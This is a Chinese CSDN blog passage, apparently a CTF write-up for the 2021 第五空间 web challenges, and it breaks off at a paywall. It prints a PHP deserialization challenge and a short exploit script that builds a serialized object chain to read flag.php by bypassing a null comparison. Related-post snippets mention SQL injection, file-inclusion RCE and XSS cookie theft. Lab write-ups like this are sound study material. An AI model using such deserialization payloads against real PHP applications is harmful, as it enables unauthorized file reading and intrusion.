[第五空间 2021]web 复现wp

已于 2022-09-14 13:22:30 修改
阅读量637 收藏 2
点赞数 2
分类专栏: nssctf 文章标签: php
于 2022-09-13 14:15:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowlyzz/article/details/126807755
版权
这篇博客回顾了第五空间2021的多个Web挑战,包括pklovecloud的unserialize绕过、EasyCleanup的临时文件包含漏洞利用、yet_another_mysql_injection的SQL注入和PNG图片转换器的命令注入。作者详细介绍了每个挑战的关键代码、解题思路和总结,强调了在面对不同漏洞时的思考方向和技术细节。
摘要由CSDN通过智能技术生成

目录

 [第五空间 2021]pklovecloud

官方解:

总结:

[第五空间 2021]EasyCleanup

考点:

思路:

总结:

[第五空间 2021]yet_another_mysql_injection

[第五空间 2021]PNG图片转换器

解题:

总结:

 [第五空间 2021]pklovecloud

 <?php  
include 'flag.php';
class pkshow 
{  
    function echo_name()     
    {          
        return "Pk very safe^.^";      
    }  
} 

class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {      
        $this->cinder = new pkshow;
    }  
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}  

class ace
{    
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    {   
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
        $file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    }  
}  

if (isset($_GET['pks']))  
{
    $logData = unserialize($_GET['pks']);
    echo $logData; 
} 
else 
{ 
    highlight_file(__file__); 
}
?>

exp 很好构造  就是要绕过两个点:

  $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)

关键代码在这里, 如果 这里的docker为空的时候, this -> OpenStack 自然为空对象,则$this->openstack->neutron === $this->openstack->nova两侧都为null自然可绕过。.

测试代码:

<?php

$a="";
$b=unserialize($a);
var_dump($b);//bool(false)
var_dump($a->sss);//报异常并返回null
var_dump($a->ttt->xxx===null);//bool(true)
?>

可以看见以上代码。 $b对象的属性都为空。

构造exp:

<?php
class acp 
{   
    public $cinder;  
    public $neutron;
    public $nova;
}
class ace
{    
    public $filename;     
    public $openstack;
    public $docker;
}
$b=new acp();
$c=new ace();
$b->cinder=$c;
$c->docker='';
$c->filename='flag.php';
echo urlencode(serialize($b));



?>

没跑出来,但是对照了wp 也没问题。

官方解:

<?php
class acp
{ 
    protected $cinder; 
    public $neutron;
    public $nova;
    function __construct()
    {
最低0.47元/天 解锁文章
snowlyzz
关注
专栏目录
NSSCTF-第五空间2021-wp
F1rstb100d
09-24 1200
NSSCTF-第五空间2021-wp
2021第五空间网络安全大赛
Huamang的博客
09-17 1233
WebFTP https://github.com/wifeat/WebFTP 根据github的源码,去对网站进行分析,有写到初始账号 但是题目改了密码,登不进 然后下载到题目的Config.php.bak,看到版本是v2.3 出现了git泄漏,无法下载到文件,但是看到了目录结构 找到探针 http://114.115.185.167:32770/Readme/mytz.php http://114.115.185.167:32770/Readme/mytz.php?act=phpinfo 直接找到f
2021 第五空间 ctf wp
qq_45603443的博客
09-23 3364
2021 第五空间 ctf Misc签到alpha10BabyMiCryptoECCReverseuniappPwnbountyhunterCrazyVMWebEasyCleanuppklovecloudPNG图⽚转换器WebFTPyet_another_mysql_injection Misc 签到 flag{welcometo5space} alpha10 分离得到两个图⽚,⼀个jpg⼀个png, 两张图⼀样,想到可能是盲⽔印, https://github.com/chishaxie/BlindWa
[第五空间 2021]EasyCleanup
最新发布
liaochonxiang的博客
08-18 377
注意的是,如果我们只上传一个文件,这里也是不会遗留下Session文件的,所以表单里必须有两个以上的文件上传。【文件包含&条件竞争】利用session.upload_progress文件包含进行RCE。
2021第五空间CTF_web_wp
meteox的博客
09-20 2296
web WebFTP 这个开始时有个1.txt直接访问,里面就有包括flag等的各种环境信息,不知道是忘删了还是有师傅导出的、、、 这个程序直接GitHub上可以找到源代码,里面有个php探针,这就可以得到各种信息了 https://github.com/wifeat/WebFTP/blob/master/Readme/mytz.phpphpinfo中可以得到flag http://114.115.185.167:32770/Readme/mytz.php?act=phpinfo pkloveclou
opcourse sql布尔盲注 WP复现
weixin_30300523的博客
04-25 96
当时做这题的时候,写了脚本,用的if(mid())<>来爆破的,可能因为写脚本不擅长,写的太乱了,直接把payload写进mid里,整个一堆,然后括号对着WP看的时候,少了好几个括号,导致爆破失败,真的臭FIVE。首先来复现一遍把 一般都是习惯性查看源代码, 、 其实就是过滤了一些函数和and,=等 ,这些被过滤的话,而且对应着 我一开始想到的就是bool盲注,用...
[MRCTF2021]Web复现ez_larave1
Huamang的博客
04-20 936
ez_larave1 考察的是Laravel的CVE-2019-9081,影响版本为5.7.x get到一个新工具:BeyondCompare,用来比较文件差异的,可以比较方便的看出他做了哪些开发 把5.7.x的源码下载下来,比较一下,发现序列化! 有个小绕过,在serialize后随便加一点东西就可以了,比如serializeabc 与网上的poc不同,他的路由命名为hello了,在hello路由下可以执行反序列化 在网上找到的cve复现,看到漏洞是在PendingCommand.php出现的,跑去看
MRCTF web部分复现wp
xlcvv的博客
04-05 711
一、ez_bypass 换个界面- 这个有点丑: GET两个参数:gg 和 id,md5值相同但本值不同,md5碰撞,之前有做过:,但是试了一些值都不行? 那就传入的为数组,md5()函数无法处理数组,如果传入数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。 显示出了You got the first steponly one way to get the fl...
[CTFshow]吃瓜杯复现wp
Huamang的博客
08-19 957
热身 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]|\./i", $num)){ die("no no no!!"); } if(!strpos($num,
第一届暗泉杯web wp(包括复现),以及部分签到题
m0_57674981的博客
12-08 3460
总分2108,排行57,还是太水了,记录一下叭 目录 web 签到题: [萌]odd_upload easyinject hideandseek 杂项 签到 [萌新]在哪呢 密码学 [签到]键盘侠 [萌新]素数 逆向 [签到]signin web 签到题: 直接手拼出来,提交后发现不对,base64在解密一下就过了 [萌]odd_upload 题目描述:目录结构与官方项目example相同 打...
hctf2018wp复现
weixin_30274627的博客
11-12 269
1、bottle 登陆网站后存在提交url的地方 测试发生存在如下paload,知识点:1、crlf 2、写一个网站开发的端口小于80,浏览器就不会跳转能执行js(payload只能在火狐浏览器执行): 验证码部分可以生成1-10000的Md5值 ,构造如下payload: 下面这个图就是打到自己的cookie。如果将这个payload提交到url那里,也就是...
LCTF wp简单复现
weixin_30502965的博客
11-20 270
1、T4lk 1s ch34p,sh0w m3 the sh31l 代码如下: <?php $SECRET = `../read_secret`; $SANDBOX = "../data/" . md5($SECRET. $_SERVER["REMOTE_ADDR"]); $FILEBOX = ...
2022蓝帽杯初赛密码wp复现
mxx307的博客
07-11 760
2022蓝帽杯密码题wp复现
wp复现 【全国大学生信息安全初赛】报错+无列名SQL注入
这周末在做梦的博客
05-20 527
本次复现的目的在于掌握无列明注入的要点一,什么是无列名注入二,成品展示三,配置与代码 一,什么是无列名注入 二,成品展示 三,配置与代码
web WP
ANYOUZHEN的博客
10-22 470
1. bugku post 安装hackbar,不要花钱去买license,使用hackbar中的2.1.3版本,这个是老版本,但是实际功能差不了多少的,我们进行解压,选择红圈里面的 并且在火狐中进行管理,因为如果不进行管理的话,这个插件会自动的给你更新成要收费的版本,我们把自动更新给他关闭,然后我们进入题目,题目很简单,是一个post,我们根据题目的提示,直接选择post data,将what=flag,发送,flag秒出 ...
2022NCTF的部分wp复现
v2ish1yan的博客
12-14 554
2022NCTF的部分wp
[羊城杯2021]web wp
l11III1111的博客
09-12 1143
[羊城杯2021]web wp 题目页面进去就是源码,传入两个参数一个用来包含,一个来触发反序列化。 <?php highlight_file('index.php'); error_reporting(0); $gwht= $_GET["gwht"]; $ycb= $_GET["ycb"]; if(preg_match("/flag/",$gwht)){ die('hack' ); } if(preg_match("/secret/",$gwht)){ die('hack' ); }
Buuctf -web wp汇总(三)
Alexhirchi的博客
07-15 2375
Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 Buuctf -web wp汇总(三):链接 文章目录[WUSTCTF2020]朴实无华[WUSTCTF2020]颜值成绩查询[GKCTF2020]EZ三剑客-EzWeb[CISCN2019 华北赛区 Day1 Web5]CyberPunk[V&N2020 公开赛]TimeTravel[NCTF2019]True XML cookbook [WUSTCTF2020]朴实无华 要点:逻辑漏洞 函数绕过 进入.
2024云曦考核Web复现:密码破解与购物漏洞利用
"本文介绍了24年云曦考核中关于Web方向的部分题目,涉及Web安全及Burp Suite工具的使用,特别是 Intruder 模块在密码爆破和漏洞利用中的应用。" 在这次云曦考核的Web方向题目中,首先是一个与“师姐的生日”相关的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值